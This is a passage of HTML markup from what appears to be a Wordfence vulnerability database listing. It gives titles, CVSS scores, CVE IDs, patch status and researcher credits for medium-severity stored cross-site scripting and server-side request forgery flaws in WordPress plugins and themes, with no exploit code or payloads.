<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quoc-huy-jtwings" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cb9373b67e4240c01c77d2af2ea71179.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cb9373b67e4240c01c77d2af2ea71179"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/quoc-huy-jtwings" target="_blank" rel="noopener">Quốc Huy (jtwings)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2bcc2783-1c47-47e4-ba63-822012aba0a6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8b9ea717-65a3-49a3-80ca-a91797e8465c" target="_blank" rel="noopener">Orbit Fox: Duplicate Page, Menu Icons, SVG Support, Cookie Notice, Custom Fonts &amp; More &lt;= 3.0.7 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65563" target="_blank" rel="noopener noreferrer">							CVE-2026-65563						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 24, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/themeisle-companion" target="_blank" rel="noopener">Orbit Fox: Duplicate Page, Menu Icons, SVG Support, Cookie Notice, Custom Fonts &amp; More</a> <span class="wfvr-software-slug">[themeisle-companion]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8b9ea717-65a3-49a3-80ca-a91797e8465c" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21019e1f-3d09-4727-8788-281c647d39dc" target="_blank" rel="noopener">Photo Block – A Modern Image Block With Lightbox and Caption Support &lt;= 1.7.1 &#8211; Authenticated (Author+) Sever-Side Request Forgery</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-24639" target="_blank" rel="noopener noreferrer">							CVE-2026-24639						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/photo-block" target="_blank" rel="noopener">Photo Block – A Modern Image Block With Lightbox and Caption Support</a> <span class="wfvr-software-slug">[photo-block]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arif-shaikh" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/0412e840e77b2936441bafa1347ba51a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="0412e840e77b2936441bafa1347ba51a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/arif-shaikh" target="_blank" rel="noopener">Arif Shaikh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/21019e1f-3d09-4727-8788-281c647d39dc" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/664e5a7a-bb40-4615-9482-a285bed9b23b" target="_blank" rel="noopener">Photo Gallery – GT3 Image Gallery &amp; Gutenberg Block Gallery &lt;= 2.7.7.29 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65519" target="_blank" rel="noopener noreferrer">							CVE-2026-65519						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gt3-photo-video-gallery" target="_blank" rel="noopener">Photo Gallery – GT3 Image Gallery &amp; Gutenberg Block Gallery</a> <span class="wfvr-software-slug">[gt3-photo-video-gallery]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/664e5a7a-bb40-4615-9482-a285bed9b23b" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f645d0c-d641-4fff-a4f4-33c037de30e9" target="_blank" rel="noopener">Post Grid Gutenberg Blocks &lt;= 5.0.32 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;searchnoresult&#8217; Block Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15100" target="_blank" rel="noopener noreferrer">							CVE-2026-15100						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-post" target="_blank" rel="noopener">Post Grid Gutenberg Blocks – PostX</a> <span class="wfvr-software-slug">[ultimate-post]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f645d0c-d641-4fff-a4f4-33c037de30e9" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3851607-73e7-44ae-8d5b-e8b7460851ea" target="_blank" rel="noopener">Rich Showcase for Google Reviews &lt;= 6.9.9 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;pagination&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15739" target="_blank" rel="noopener noreferrer">							CVE-2026-15739						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/widget-google-reviews" target="_blank" rel="noopener">Rich Showcase for Google Reviews</a> <span class="wfvr-software-slug">[widget-google-reviews]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/c3851607-73e7-44ae-8d5b-e8b7460851ea" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6915931e-fcad-4eca-9be5-f0b8f5c4aec2" target="_blank" rel="noopener">Slider Pro &lt;= 4.8.13 &#8211; Authenticated (Subscriber+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-57699" target="_blank" rel="noopener noreferrer">							CVE-2026-57699						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sliderpro" target="_blank" rel="noopener">Slider Pro</a> <span class="wfvr-software-slug">[sliderpro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/manopakorn-kooharueangrong" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/286d15edd1a2991d782433f14788645a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="286d15edd1a2991d782433f14788645a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/manopakorn-kooharueangrong" target="_blank" rel="noopener">Manopakorn Kooharueangrong (manop55555)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/6915931e-fcad-4eca-9be5-f0b8f5c4aec2" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f04fa24-95e3-4480-858e-9101ecae05e3" target="_blank" rel="noopener">Smart SEO Tool – SEO优化插件 &lt;= 4.1.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65533" target="_blank" rel="noopener noreferrer">							CVE-2026-65533						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-seo-tool" target="_blank" rel="noopener">Smart SEO Tool – SEO优化插件</a> <span class="wfvr-software-slug">[smart-seo-tool]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1f04fa24-95e3-4480-858e-9101ecae05e3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9dc5e3-9d72-4c04-8ba9-56428a6fdddd" target="_blank" rel="noopener">Spectra Gutenberg Blocks &lt;= 2.19.28 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via uagb/image Block</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-12900" target="_blank" rel="noopener noreferrer">							CVE-2026-12900						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 20, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-addons-for-gutenberg" target="_blank" rel="noopener">Spectra Legacy – Gutenberg Blocks</a> <span class="wfvr-software-slug">[ultimate-addons-for-gutenberg]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/01dce303f1fab51371215f21992679d9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="01dce303f1fab51371215f21992679d9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/theviper17y" target="_blank" rel="noopener">theviper17y</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0e9dc5e3-9d72-4c04-8ba9-56428a6fdddd" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/260c8ee3-dac5-4ad7-ba77-2312160e9348" target="_blank" rel="noopener">SureDash &lt;= 1.10.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15821" target="_blank" rel="noopener noreferrer">							CVE-2026-15821						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/suredash" target="_blank" rel="noopener">SureDash – Community, Courses &amp; Member Dashboard</a> <span class="wfvr-software-slug">[suredash]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/260c8ee3-dac5-4ad7-ba77-2312160e9348" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8094e72e-1a9d-40da-95fb-14e341ce9ac1" target="_blank" rel="noopener">TheGem &lt;= 5.11.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65480" target="_blank" rel="noopener noreferrer">							CVE-2026-65480						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="unpatched"><br />
						Unpatched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/thegem" target="_blank" rel="noopener">TheGem</a> <span class="wfvr-software-slug">[thegem]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f68b92d2360e69ed80348d13de97c4d0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f68b92d2360e69ed80348d13de97c4d0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-s-alcantara-kinorth" target="_blank" rel="noopener">João Pedro S Alcântara (Kinorth)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/8094e72e-1a9d-40da-95fb-14e341ce9ac1" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39f26d35-a702-49fc-aed1-0a329ac32553" target="_blank" rel="noopener">Ultimate Addons for Elementor &lt;= 2.9.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Navigation Menu Widget data-toggle-icon/data-close-icon Attributes</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15787" target="_blank" rel="noopener noreferrer">							CVE-2026-15787						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 21, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/header-footer-elementor" target="_blank" rel="noopener">Ultimate Addons for Elementor</a> <span class="wfvr-software-slug">[header-footer-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asaf-mozes" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e4a8b174c9f284d94094cf7722e1ec31.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e4a8b174c9f284d94094cf7722e1ec31"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/asaf-mozes" target="_blank" rel="noopener">Asaf Mozes</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/39f26d35-a702-49fc-aed1-0a329ac32553" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/80e0db86-0073-4797-93b1-aa2141f3e60a" target="_blank" rel="noopener">Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor &lt;= 3.0.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65503" target="_blank" rel="noopener noreferrer">							CVE-2026-65503						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-store-kit" target="_blank" rel="noopener">Ultimate Store Kit – Addon For WooCommerce, EDD and Elementor</a> <span class="wfvr-software-slug">[ultimate-store-kit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/851f04ad769b87bcc7fe5afe8300abd1.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="851f04ad769b87bcc7fe5afe8300abd1"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nguyen-ba-khanh-2" target="_blank" rel="noopener">Nguyen Ba Khanh</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/80e0db86-0073-4797-93b1-aa2141f3e60a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/15ed3837-2a52-4d1d-81da-a704aceac684" target="_blank" rel="noopener">Virtue/Ascend/Pinnacle Toolkit &lt;= 4.9.12 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-65473" target="_blank" rel="noopener noreferrer">							CVE-2026-65473						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 22, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/virtue-toolkit" target="_blank" rel="noopener">Virtue/Ascend/Pinnacle Toolkit</a> <span class="wfvr-software-slug">[virtue-toolkit]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ananda-dhakal" target="_blank" rel="noopener">Ananda Dhakal</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/15ed3837-2a52-4d1d-81da-a704aceac684" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/914554fd-1525-4925-bce4-2df4a8df5dbf" target="_blank" rel="noopener">Visualizer &lt;= 4.0.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;backend-title&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15653" target="_blank" rel="noopener noreferrer">							CVE-2026-15653						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 23, 2026</strong>
			</div>
</p></div>
<div class="row">
